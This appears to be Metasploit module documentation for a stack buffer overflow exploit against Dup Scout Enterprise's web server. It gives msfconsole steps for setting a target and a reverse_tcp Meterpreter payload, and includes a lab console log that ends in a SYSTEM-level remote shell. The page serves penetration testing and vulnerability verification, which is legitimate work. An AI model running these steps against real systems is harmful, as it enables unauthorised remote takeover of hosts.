infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/windows/http/dupscts_bof.md

2.8 KiB
Raw Blame History

Vulnerable Application

Dup Scout Enterprise versions up to v9.5.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at Exploit-DB.

Verification Steps

  1. Install a vulnerable Dup Scout Enterprise
  2. Start Dup Scout Enterprise service
  3. Start Dup Scout Enterprise client application
  4. Navigate to Tools > Dup Scout Options > Server
  5. Check Enable Web Server On Port 80 to start the web interface
  6. Start msfconsole
  7. Do use exploit/windows/http/dupscts_bof
  8. Do set RHOST ip
  9. Do check
  10. Verify the target is vulnerable
  11. Do set PAYLOAD windows/meterpreter/reverse_tcp
  12. Do set LHOST ip
  13. Do exploit
  14. Verify the Meterpreter session is opened

Scenarios

###Dup Scout Enterprise v9.5.14 on Windows 7 SP1

msf exploit(dupscts_bof) > show options 

Module options (exploit/windows/http/dupscts_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    172.16.0.18      yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.0.20      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Dup Scout Enterprise v9.5.14


msf exploit(dupscts_bof) > exploit 

[*] Started reverse TCP handler on 172.16.0.20:4444 
[*] Sending request...
[*] Sending stage (957487 bytes) to 172.16.0.18
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.18:49162) at 2017-04-26 15:16:08 +0100

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo 
Computer        : PC-01
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : pt_PT
Domain          : LAB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >